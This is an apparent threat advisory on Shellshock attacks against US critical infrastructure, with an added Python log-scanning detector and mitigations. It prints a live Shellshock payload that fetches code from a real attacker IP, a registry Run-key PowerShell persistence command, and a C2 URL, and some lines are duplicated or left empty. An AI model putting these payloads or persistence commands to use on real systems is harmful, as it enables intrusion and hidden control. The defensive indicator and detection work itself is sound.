Based on historical and current investigative analysis, cyber actors are targeting US critical infrastructure using a malicious attachment that leverages the “shellshock” vulnerability. The same tactics, techniques and procedures (TTPs) could be used against other US critical infrastructure sectors. US authorities are providing the following indicators of compromise, identified malicious code, and suspect internet protocol (IP) addresses to assist receiving organizations’ computer network defense.[1]
A malicious attachment leveraging the “shellshock” vulnerability achieves arbitrary code execution: it passes crafted variables into “bash”, the shell commonly used on Linux systems, by modifying the originating HTTP request so that bash runs those variables as commands, which lets the attacker upload or run a program. Once the malware was established, it communicated out over HTTP port 8080 to a listening command and control (C2) server.
Malicious code
()+{+:;+};+/bin/bash+-c+'wget+http://176.126.85.127:8080/megatron+-O+/dev/null'
"shellshock" vulnerability:
()+{+:;+};+/bin/bash+c+'wget+http://176.126.85.127:8080/megatron+-O+/dev/null'
l__l_=%7CF3Jk%7E6k6
default.php
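As an added example (not part of the advisory or of the FBI flash it cites), the following Python script turns the indicator above into a detection rule over constructed web-server log lines: it URL-decodes each quoted header field, matches the bash function prefix `() { :; };` in any spacing, and extracts the download URL and whether it points at port 8080. The log lines, source addresses and the curl variant are constructed; only the megatron URL is from the advisory.

```python
import re
from urllib.parse import unquote_plus

# Bash function-definition prefix that triggers CVE-2014-6271 ("Shellshock")
# when bash imports it from an environment variable such as HTTP_USER_AGENT.
# Whitespace is optional so both "() { :; };" and "() {:;};" are caught.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:\s*;\s*\}\s*;")
# Download-and-execute behaviour described in the advisory: an outbound
# fetch to a C2 host following the prefix.
FETCH_RE = re.compile(r"\b(wget|curl)\b[^'\"]*?(https?://[^\s'\"]+)")

# Constructed sample log lines (combined log format, not from the advisory).
# Line 1 carries the advisory's URL-encoded payload in the User-Agent field,
# line 2 is benign traffic, line 3 is a constructed variant with TEST-NET C2.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "()+{+:;+};+/bin/bash+-c+'wget+http://176.126.85.127:8080/megatron+-O+/dev/null'"
198.51.100.7 - - [10/Oct/2014:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Iceweasel/31.8.0"
203.0.113.9 - - [10/Oct/2014:13:57:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c 'curl http://192.0.2.10:8080/x -o /tmp/x'"
"""


def is_shellshock_probe(raw_field: str) -> bool:
    """True if a (possibly URL-encoded) header value carries the bash prefix."""
    return SHELLSHOCK_RE.search(unquote_plus(raw_field)) is not None


def scan_log(text: str) -> list:
    """Return one hit per log line whose quoted fields contain the prefix."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        src_ip = line.split(" ", 1)[0]
        # Quoted fields in combined log format: request, referer, user-agent.
        for raw in re.findall(r'"([^"]*)"', line):
            decoded = unquote_plus(raw)
            if not SHELLSHOCK_RE.search(decoded):
                continue
            m = FETCH_RE.search(decoded)
            url = m.group(2) if m else None
            hits.append({
                "line": lineno,
                "src": src_ip,
                "c2_url": url,
                "port_8080": bool(url and ":8080/" in url),
            })
            break  # one hit per line is enough for alerting
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```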
Registry keys
User registry keys:
Key: Software\Microsoft\Windows\CurrentVersion Value: Debug: (Base64 encoded string)
Key: Software\Microsoft\Windows\CurrentVersion\Run
Value: Updater: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"
C2 server: http://199.71.234.66:8080/index.asp
C:/windows/mssecsvr[.]exe
IPs beaconing over port 8080
User-Agent String: Iceweasel/31.8.0
Suspicious IP Addresses
Recommended Mitigations
We suggest precautionary measures to mitigate the threats posed by this vulnerability, specifically scrutinizing any links and/or attachments included in unsolicited emails. In addition to limiting the attack vector, it is important to limit the exposure if a network breach occurs. Proper network segmentation and segregation will assist in limiting exposure of the network and lateral movement of the adversary. This is always a good cyber security practice. Precautionary measures to mitigate these techniques include:
- Prepare an incident response plan to be rapidly implemented in the event of a cyber intrusion.
- Implement multifactor authentication to protect individual accounts.
- Patch all systems for critical vulnerabilities, prioritizing timely patching of Internet-connected servers for known vulnerabilities and software that processes internet data, such as web browsers, browser plugins, and document readers.
- Scrutinize links contained in e-mails and do not open attachments included in unsolicited e-mails.
- Implement application whitelisting to block execution of malware, or at least block execution of files from TEMP directories, from which most phishing malware attempts to execute.
- Randomize local administrator passwords to inhibit lateral movement across workstations.
- Ensure patches are applied and systems are upgraded to the most up-to-date version of bash to mitigate an attacker's ability to use “() {:;};” to remotely exploit the bash shell.
For questions or comments regarding this report, please contact Wapack Labs at 603-606-1246, or feedback@wapacklabs.com
[1] FBI Flash Report / MC-000097-MW fbi.gov